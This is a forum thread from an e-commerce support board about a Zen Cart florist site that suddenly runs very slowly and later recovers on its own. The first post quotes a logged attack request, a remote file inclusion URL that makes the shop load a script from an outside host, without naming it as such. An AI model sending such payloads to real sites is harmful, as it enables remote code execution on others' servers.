Site suddenly running extremely slow

One site - broadwayfloral.com - is suddenly (within the last couple of hours) is running glacially slow.

Home page:
parse time 0.186

queries 398

query time 0.07634

Page load time is anywhere from 46 secs to 1:16 minutes.

When I could finally load admin and looked at who's online, I found 8 to 10 of these:

http://www.broadwayfloral.com/discount_coupon.html/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hb.let.tw/xoops_data/fx29id.txt?

Three different ips sending three or four each of these.

The vps is reporting only 12% usage, other sites load just fine.
Disabled SSL logo and Security Metrics thinking that might be the problem but didn't matter. Unloaded most recent security patch and no faster either.

Both my home location and the bricks and mortar store have the same slow load.

Anyone have any suggestions?
Thanks!

Doug

Re: Site suddenly running extremely slow

Thanks Dr Byte, but I've done that (and I just checked).

I just rebooted (it fixes some things, right?) and tried to get back onto the site. From admin login to admin screen-

fully loaded - 1.12.730 minutes
speed .52KB/s

from admin screen to online catalog:
fully loaded - 1.36.730 minutes
speed .63KB/s

:(

Re: Site suddenly running extremely slow

So now it seems not to be a Zen Cart issue.

All sites have slowed way down, but if I access them through a proxy, they run just fine.

Re: Site suddenly running extremely slow

Just as suddenly as the slow down occurred, it went away.

My money is that somewhere there was a bad router that was slowing traffic.

Re: Site suddenly running extremely slow

Your site loaded great for me, took about 4 seconds.

HomePage:
Parse Time: 0.354 - Number of Queries: 398 - Query Time: 0.23461637883

Is the problem intermittent? You should check with your host and see if they have any updates running on the server... that could temporarily slow things down.

Re: Site suddenly running extremely slow

Thanks for checking Jackie.

Just as suddenly as it slowed, it returned to normal. I checked the WHM and CPU load was low, memory and other resources were fine.

Hosting support reported page load times like yours, so I figured it was a routing problem somewhere.
